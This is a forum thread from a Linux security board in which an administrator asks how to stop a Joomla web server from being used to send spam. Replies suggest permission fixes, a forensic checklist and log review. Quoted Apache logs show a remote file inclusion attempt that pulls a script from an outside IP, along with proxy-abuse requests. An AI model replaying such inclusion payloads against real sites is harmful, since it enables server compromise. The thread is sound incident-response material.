LinuxQuestions.org
Did you know LQ has a Linux Hardware Compatibility List?
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices



Reply
 
Search this Thread
Old 07-22-2009, 07:06 PM   #1
rogerdv
Member
 
Registered: Jul 2005
Location: Cuba
Distribution: redhat
Posts: 52

Rep: Reputation: 15
apache being used for spamming


First of all i have to explain that this is not my server. Im just trying to fix a setup I didnt installed of configured, I just have access to it via ssh, so, my info perhaps is incomplete or inacurate.
The problem is that this particular server is being used for sending spam using apache scripts. MTA is qmail and seems to be properly configured to forbid open relay. The distro used is Fedora 6, and it seems to be mostly a web server, it hosts serveral sites (with apache 2.2.3) built with Joomla 1.0.15.
Here is the mail from technical support explaining the problem:

Quote:
Hello,

We could see spamming from your server. Thats why the mail queue become this much huge. This is the content of spam from your server

*********************
--------------
MESSAGE NUMBER 10503249
--------------
Received: (qmail 9567 invoked by uid 48); 20 Jul 2009 10:16:06 -0500
Date: 20 Jul 2009 10:16:06 -0500
Message-ID: <20090720151606.9564.qmail@PanamB.ds>
To: dan1988@yandex.ru, dan1988dan@yandex.ru, dan1989@yandex.ru,
dan1990@yandex.ru, dan1991@yandex.ru, dan19921992@yandex.ru,
dan1993@yandex.ru, dan1994@yandex.ru
Subject: ���������c3kc!!
From: chasm4@gmail.com
To: dan1988@yandex.ru, dan1988dan@yandex.ru, dan1989@yandex.ru,
dan1990@yandex.ru, dan1991@yandex.ru, dan19921992@yandex.ru,
dan1993@yandex.ru, dan1994@yandex.ru
Subject: ���������c3kc!!
Reply-To: chasm4@gmail.com
Mime-Version: 1.0
Content-type: text/html; charset=windows-1251


�� ������� . ���� �� ����� ������� �oTuKu ,
�� ������� http://drjiwa.com/includes/jndex.html ��� �� �. ���� ����� ... ������������
************************

The spam mails are sent from apache using scripts. I have disabled some of the scripts. Please check the UID of the user who is sending the mail. This clearly indicated that the spam mails are sending out of server via apache service.

**************
Received: (qmail 9049 invoked by uid 48); 20 Jul 2009 05:54:59 -0500
[root@PanamB ~]# grep 48 /etc/passwd
apache:x:48:48:Apache:/var/www:/sbin/nologin
[root@PanamB ~]# grep 48 /etc/passwd
apache:x:48:48:Apache:/var/www:/sbin/nologin
antadbiz:x:10005:48::/var/www/vhosts/antad.biz:/bin/false
**************


As the number of message in the queue was too large, the email service in the server was down. Qmail was not able to process the queue. So I have cleared the qmail queue to make the mail service working.

Now the mails are going out of the server. Currently there is no spamming in the server.

****************
[root@PanamB ~]# ./qmHandle -s
Messages in local queue: 0
Messages in remote queue: 0
[root@PanamB ~]#
***************

Please do verify from your part.

In case you have any further queries or troubles, please do let us know the same with sufficient LOGIN DETAILS (with password, ports, etc. for checking), the EXACT steps/URLs to recreate the scenario at our end. Also include any needed ERROR details.


We have checked your query in detail. We could see that some of the domains( canalpaisano.com,eduardoestrella.net fernandoelizondo.org iq-zone.com partidopatriota.com partidopatriota.net patriajoven.com ) has some suspicious files hosted inside them. We had to disable some of those scripts. Upon further analysis we could see that many files and directories were provided 777 permission which is really dangerous. This will help any hacker to exploit the server and send out spam. We suggest you to go through the files and modify the permissions.

>>>>What should we do to avoid this problem forever?

In-order to resolve this problem you need to conduct a detailed security audit in the server to check for vulnerabilities. You may to apply patches and other security fixes if necessary.
To prevent further spam I modified the sendmail_path in php.ini. So, php cant send anymore mails. But Im aware that this is not the optimal solution. Can somebody suggest me the correct way to deal with this problem? Also, how can I search all the files with permissiones set to 777 to correct them?
 
Old 07-22-2009, 07:37 PM   #2
GaijinPunch
Member
 
Registered: Aug 2003
Location: Tokyo, Japan
Distribution: Gentoo
Posts: 130

Rep: Reputation: 22
To find files w/ 777 permissions:

Code:
find / -perm 777 -print
As for the PHP sending mails... it could be any number of scripts doing the mailing. If they are well made scripts (which they very likely aren't) they use some central type of class to do the mailing (I use phpmailer). If you find this class, it makes searching the php scripts easier. You could also modify it to take some type of validation paramter, and have any legit mailing routine pass that parameter, and in effect nullify any spam script. They still might eat up CPU though.

On the flip side, each script could also do all the "mailing" itself, which could make the hunt a lot nastier.

Last edited by GaijinPunch; 07-22-2009 at 07:38 PM.
 
Old 07-22-2009, 08:07 PM   #3
rogerdv
Member
 
Registered: Jul 2005
Location: Cuba
Distribution: redhat
Posts: 52

Original Poster
Rep: Reputation: 15
Still hunting the conflictive scripts. But 777 files and directories are thousands. Is there any way to recursively run chmod to fix the files and directories at the same time without messing the x permission for directories?
 
Old 07-22-2009, 11:24 PM   #4
win32sux
Guru
 
Registered: Jul 2003
Location: Los Angeles
Distribution: Ubuntu
Posts: 9,870

Rep: Reputation: 371Reputation: 371Reputation: 371Reputation: 371
Quote:
Originally Posted by rogerdv View Post
Still hunting the conflictive scripts. But 777 files and directories are thousands. Is there any way to recursively run chmod to fix the files and directories at the same time without messing the x permission for directories?
You could do a:
Code:
find / -type f -perm 777 -exec chmod XXX {} \;
Replace XXX with the perms you want to assign, and remove "-type f" if you don't only want to chmod files.

Make sure you BACKUP everything before doing anything.

Last edited by win32sux; 07-22-2009 at 11:25 PM.
 
Old 07-23-2009, 07:06 AM   #5
unSpawn
Moderator
 
Registered: May 2001
Posts: 27,703
Blog Entries: 54

Rep: Reputation: 2964Reputation: 2964Reputation: 2964Reputation: 2964Reputation: 2964Reputation: 2964Reputation: 2964Reputation: 2964Reputation: 2964Reputation: 2964Reputation: 2964
...in addition to what's been said already, and before you go off hunting for file permissions it would be good to create an overview of things to do.


Quote:
Originally Posted by rogerdv
First of all i have to explain that this is not my server. Im just trying to fix a setup I didnt installed of configured,
It is good that you are taking responsability for correcting mistakes. This not being your server doesn't require any apologies, in fact it can be an advantage because you can look at things more objectively. You should choose to make an effort in being as complete as possible, because more than chmodding is needed and you should perform tasks in as short a timeframe as possible. In perparation make sure you
- have the right tools at your disposal and
- keep a clear eye on the goals.
You should choose to
- keep a checklist and log of tasks you perform,
- locate and make backs whenever necessary and
- have an overview of things to mitigate and problems to correct and a plan to work with.
Also please list what tasks you have performed already when you reply. This enables us to help you better.
* Since this is a commercial hosting platform you have to make clear to yourself that while you perform those tasks you can not serve two masters because as long as the current situation is allowed to exist the machine remains susceptible to abuse.

* Use 'screen' to enable yourself to run multiple tasks in different virtual terminal windows (and do enable logging with CTRL-A, H).
The first things to do would be to make sure the foundation you work on is trustworthy and mitigate:
0. verify the system state ('rpm -Vva 2>&1| tee /root/rpmva.log') and review the log,
1. do not log in as root but have a suitable unprivileged account to SSH into and use public key authentication,
2. make sure you can use sudo to perform the necessary system maintenance, then
3. (enumerate and) ensure that only authorized users have access to the system itself (passwd, group, shadow, last, lastb, lastlog, w, who or run GNU Tiger or Lsat),
4. mitigate the situation by disallowing any clients to access the host as unauthorized or unauthorized user (vipw),
5. mitigate the situation by denying access to publicly accessable services (/etc/hosts.{allow,deny}, firewall),
6. check the last two tasks actually result in denied access (ps, lsof, iptables, netstat, last, lastb, lastlog, w, who).

Procede by taking stock of the situation and investigating:
- review the /etc/syslog.conf for logging options, then review syslog and any daemon-specific logs (visual inspection, logwatch, mailbox),
- enumerate (publicly accessable) services and who has access to those,
- review any user homes contents,
- from running 'rpm -Vva',
- install and run GNU Tiger, chkrootkit and rootkit hunter and review the logs (general system health, not rootkits),
- unpack the textfile from the joomla-file-diagnostics_1.0.15.zip and use those hashes to verify files,
- review the 8 hosts your technical support marked as having suspicious files.

When this is complete you should restore default system file permissions using 'rpm --set-perms' and chmod back any Docroot or UserDir dirs and files.

Please be as complete and verbose in your answers as possible and if anything is unclear please ask before acting.
And please do check back often as so this situation doesn't drag on for days.

* Anyone please correct me if I forgot to address anything in this assessment phase.

Last edited by unSpawn; 07-23-2009 at 04:43 PM. Reason: //Typo
 
Old 07-23-2009, 04:19 PM   #6
rogerdv
Member
 
Registered: Jul 2005
Location: Cuba
Distribution: redhat
Posts: 52

Original Poster
Rep: Reputation: 15
Ok, the attack seems to stop, or at least the last spam I see in the qmail queue are from Jul 22 around 13-14 hours. I have checked carefully the apache logs looking for suspicious activity during that time and seems that right at that time apache didnt served any files. Any idea about what other log file could help?
 
Old 07-23-2009, 07:53 PM   #7
unSpawn
Moderator
 
Registered: May 2001
Posts: 27,703
Blog Entries: 54

Rep: Reputation: 2964Reputation: 2964Reputation: 2964Reputation: 2964Reputation: 2964Reputation: 2964Reputation: 2964Reputation: 2964Reputation: 2964Reputation: 2964Reputation: 2964
Quote:
Originally Posted by rogerdv View Post
Ok, the attack seems to stop, or at least the last spam I see in the qmail queue are from Jul 22 around 13-14 hours.
That is nice but what does it really mean in terms of "plugging the hole"?


Quote:
Originally Posted by rogerdv View Post
I have checked carefully the apache logs looking for suspicious activity during that time and seems that right at that time apache didnt served any files.
Maybe looking through logrotated or archived logs you may reveal more.


Quote:
Originally Posted by rogerdv View Post
Any idea about what other log file could help?
Depending on what's running, when and how logs get rotated and where your applications write to, how about the result of 'lsof -P -w -n +D/var | awk '/[0-9].*w / {print $NF}'|sort -u'?

BTW you haven't addressed about anything in the last two replies. Is there anything you didn't get? Do you think it's overkill? Do you have reading problems? ;-p

Last edited by unSpawn; 07-23-2009 at 07:55 PM. Reason: //Typo
 
Old 07-23-2009, 08:28 PM   #8
rogerdv
Member
 
Registered: Jul 2005
Location: Cuba
Distribution: redhat
Posts: 52

Original Poster
Rep: Reputation: 15
I followed some of your advices, some others were not needed (tech support installed and executed rootkit detection tools) and other were already implemented. So, your reply was useful and the only persisting problem is that we cant find what files were used to send the mails (and so, probably I wont get paid for 2 days of looking at log files and going home at 9 PM when the rest of the city is enjoying the carnivals). The tech support refers to some "disabled scripts", but they dont specify, so I dont know what do they mean by disable.
By the way, there are some weird lines in the apache logs, can somebody explain me why do they refer to external urls?

Code:
91.212.127.100 - - [22/Jul/2009:20:45:11 -0500] "GET http://ant.dsabuse.com/abc.php?auth=45V456b09m&strPassword=P%5BSHUR_FDG%5CWB&nLoginId=43 HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"

210.72.4.129 - - [23/Jul/2009:02:00:58 -0500] "GET http://www.yahoo.com/ HTTP/1.1" 200 3523 "-" "Mozilla/5.0 (compatible; MSIE 5.01; Win2000)"
210.72.4.129 - - [23/Jul/2009:02:00:58 -0500] "GET http://www.yahoo.com/ HTTP/1.1" 200 3523 "-" "Mozilla/5.0 (compatible; MSIE 5.01; Win2000)"
210.72.4.129 - - [23/Jul/2009:02:00:58 -0500] "GET http://www.yahoo.com/ HTTP/1.1" 200 3523 "-" "Mozilla/5.0 (compatible; MSIE 5.01; Win2000)"
92.240.68.152 - - [23/Jul/2009:04:42:53 -0500] "GET http://www.threeimaginarygirls.com/files/primus_0.jpg HTTP/1.1" 404 308 "http://random.yahoo.com/fast/ryl" "webcollage/1.135a"
This is another couple of lines that annoy me:
Code:
65.50.119.235 - - [22/Jul/2009:04:52:22 -0500] "GET /appserv/main.php?appserv_root=http://190.161.40.22/appserv/t.txt? HTTP/1.1" 404 292 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
65.50.119.235 - - [22/Jul/2009:04:52:22 -0500] "GET /appserv/main.php?appserv_root=http://190.161.40.22/appserv/t.txt? HTTP/1.1" 404 292 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
 
Old 07-23-2009, 09:08 PM   #9
unSpawn
Moderator
 
Registered: May 2001
Posts: 27,703
Blog Entries: 54

Rep: Reputation: 2964Reputation: 2964Reputation: 2964Reputation: 2964Reputation: 2964Reputation: 2964Reputation: 2964Reputation: 2964Reputation: 2964Reputation: 2964Reputation: 2964
Quote:
Originally Posted by rogerdv View Post
and the only persisting problem is that we cant find what files were used
Ah, I see. Well good luck with that then.


Quote:
Originally Posted by rogerdv View Post
Code:
"GET /appserv/main.php?appserv_root=http://190.161.40.22/appserv/t.txt?
Looks like (a failed attempt to) remote file inclusion to me.

Last edited by unSpawn; 07-23-2009 at 09:12 PM. Reason: //Ameliorate
 
  


Reply

Tags
apache, spam


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
My server is being used for spamming - Help! soaked Linux - Security 12 10-21-2007 05:45 PM
Apache spamming localhost Swakoo Linux - General 3 06-06-2007 10:33 AM
Spamming E.T. ... AlexV General 1 03-02-2005 10:58 AM
Cron is spamming me reitzell Linux - Newbie 2 12-04-2004 01:00 AM
sorry for spamming csspcman Linux - Laptop and Netbook 1 08-11-2003 03:34 AM


All times are GMT -5. The time now is 05:37 PM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
identi.ca: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration